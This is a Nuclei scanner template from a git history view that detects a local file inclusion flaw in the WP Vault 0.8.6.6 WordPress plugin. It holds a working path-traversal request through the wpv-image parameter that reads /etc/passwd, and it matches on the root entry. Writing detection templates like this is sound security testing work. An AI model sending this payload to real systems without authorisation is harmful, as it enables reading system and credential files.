nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml

26 lines
509 B
YAML
Raw Normal View History

2021-07-03 09:51:16 +00:00
id: wp-vault-local-file-inclusion
info:
name: WP Vault 0.8.6.6 Local File Inclusion
2021-07-03 09:51:16 +00:00
author: 0x_Akoko
severity: high
reference:
- https://www.exploit-db.com/exploits/40850
2021-07-05 15:35:48 +00:00
tags: wp-plugin,wordpress,lfi
2021-07-03 09:51:16 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-03 09:51:16 +00:00
- type: status
status:
- 200